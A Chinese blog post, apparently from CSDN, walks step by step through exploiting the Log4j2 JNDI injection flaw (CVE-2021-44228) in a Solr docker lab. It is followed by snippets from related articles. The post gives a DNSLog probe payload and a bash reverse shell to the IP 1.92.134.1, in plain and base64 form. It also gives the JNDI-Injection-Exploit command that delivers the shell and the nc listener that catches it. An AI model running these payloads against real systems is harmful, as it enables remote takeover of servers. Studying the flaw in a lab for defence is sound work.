Log4j2远程代码执行漏洞复现

最新推荐文章于 2024-08-14 11:39:49 发布
最新推荐文章于 2024-08-14 11:39:49 发布
阅读量414 收藏 6
点赞数 4
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66105152/article/details/140831533
版权

1.环境搭建 

docker-compose up -d

2.检查端口并访问

3.用dnslog平台检测dns回显,看看有没有漏洞存在

获取子域名,我是 1ilobr.dnslog.cn

4. 可以发现 /solr/admin/cores?action= 这⾥有个参数可以传

构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.1ilobr.dnslog.cn}

5.反弹shell

bash -i >& /dev/tcp/1.92.134.1/8848 0>&1

base64编码后

YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzg4NDggMD4mMQ==

命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzg4NDggMD4mMQ==}|{base64,-d}|bash" -A 1.92.134.1

6.监听自己的端口nc -lvvp 8848

访问缓存/solr/admin/cores?action=${jndi:ldap://1.92.134.1:1389/tybxdg}

╰落叶梧桐细数悲伤゛
关注
(CVE-2021-44228)Apache log4j 远程命令执行
weixin_45253622的博客
12-19 4082
漏洞简介 Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。 Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用
漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 945
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
最新发布
heike_Ch的博客
08-14 1276
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
Log4j2代码执行漏洞复现
muyuchen110的博客
07-31 158
代码】【Log4j2代码执行漏洞复现
Log4j2远程命令执行2-vulfocus-wp
miojjnum的博客
12-22 3761
vulfocus:log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境: 输入命令开启监听: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000 2、bp抓包伺候 ...
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6369
漏洞说明 Log4j是Apache的开源日志记录组件。Log4j2Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9911
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1084
以及 LDAP即轻量级目录访问协议都是名称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户名、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在名称服务中根据打印机名称获取打印机对象,并进行打印操作。
vulfocus复现Log4j2远程命令执行2
woai_zhongguo的博客
07-15 807
Log4j2远程命令执行2复现过程
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 3103
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
log4j2漏洞
weixin_66503195的博客
07-31 202
我们先编写以下的恶意文件Exploit.java,我们企图反弹shell到kali。在/solr/admin/cores?有个参数可以传,这就是个注入点。返回刚才的DNSLOg平台,点击刷新记录Refresh Recoro。监听之前Exploit.java里面写的反弹shell的端口7777。点击Get SubDomain获得一个子域。开启http服务 设置444端口。打开dnslog.cn。
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1404
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
log4j2 远程代码执行漏洞复现(CVE-2021-44228)
Welcome To Myon'Blog !
03-08 9415
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码
log4j2 远程代码执行漏洞
811
12-10 5374
本地稳定复现 无效的措施 3台机器2win 1linux 提供思路 关闭lookup 将log4j.xml里面的 %m %msg %message 替换为 %message{nolookups} %msg{nolookups} %m{nolookups}
log4j2反序列化漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-02 573
Log4j 是一个流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标。它采用了模块化的架构,包含多个组件,如日志器(Logger)、输出器(Appender)、格式器(Layout)、过滤器(Filter)等。这些组件可以根据需要进行配置和组合,以满足各种日志记录需求。
log4j2远程代码执行漏洞复现
qq_42194976的博客
07-12 1031
log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务(可能是攻击者部署好的恶意代码)。攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,造成了远程代码执行(可反弹shell到指定服务器)。
log4j远程代码执行漏洞复现
08-14
很抱歉,我不能提供最新漏洞复现过程。我作为一个 AI 助手,遵循道德准则和法律法规,不参与、支持或提供与安全漏洞相关的活动。漏洞复现涉及到潜在的非法行为和对他人系统的攻击,这是不被允许的。 如果你对最新漏洞感兴趣,我建议你关注安全研究人员、安全社区或供应商发布的漏洞公告和安全更新。这些信息可以帮助你了解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值